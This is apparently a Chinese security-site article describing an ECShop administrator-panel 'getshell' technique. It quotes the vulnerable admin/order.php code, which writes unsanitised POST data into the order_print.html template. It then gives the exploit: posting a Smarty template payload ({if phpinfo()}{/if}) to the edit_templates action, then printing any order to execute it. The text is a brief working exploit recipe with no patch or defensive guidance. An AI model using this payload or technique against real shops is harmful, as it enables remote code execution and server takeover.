热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

ECSHOP 后台getshell 方法又一则

发布时间:2014-02-24 09:45文章来源:网络文章作者:黑白前线 点击次数:
摘要:看代码 admin/order.php elseif($_REQUEST['act']=='edit_templates') { /*更新模板文件的内容*/ $ file_name =@fopen('../'.DATA_DIR.'/order_print.html','w+');//写出模板,,只要有一个调用模板就可以getshell了 echo'../'.DATA_DIR.'/order_print.html'...


看代码

 

  1. admin/order.php 
  2.  
  3. elseif ($_REQUEST['act'] == 'edit_templates') 
  4.  
  5.  
  6. /* 更新模板文件的内容 */ 
  7.  
  8. $file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); //写出模板,,只要有一个调用模板就可以getshell了 
  9.  
  10. echo '../' . DATA_DIR . '/order_print.html'; 
  11.  
  12. echo stripslashes($_POST['FCKeditor1']); 
  13.  
  14. @fwrite($file_name, stripslashes($_POST['FCKeditor1'])); 
  15.  
  16. @fclose($file_name); 
  17.  
  18. /* 提示信息 */ 
  19.  
  20. $link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list'); 
  21.  
  22. sys_msg($_LANG['edit_template_success'], 0, $link); 
  23.  
  24.  
  25. elseif ($_REQUEST['act'] == 'info') 
  26.  
  27.  
  28. 省略若干 
  29.  
  30. assign_query_info(); 
  31.  
  32. $smarty->display('order_info.htm'); 
  33.  
  34.  

我们只要先提交

 

http://www.yunsec.net/ec/admin/order.php?act=edit_templates

 

POST 内容

FCKeditor1={if phpinfo()}{/if}

然后随便查看一个订单

点击打印

就可以getshell了

 

ECSHOP 后台getshell
ECSHOP 后台getshell
ECSHOP 后台getshell

 

标签分类:

上一篇:针对目标站点渗透测试方法
下一篇:Ecshop后台getshell-2 (解析漏洞拿shell)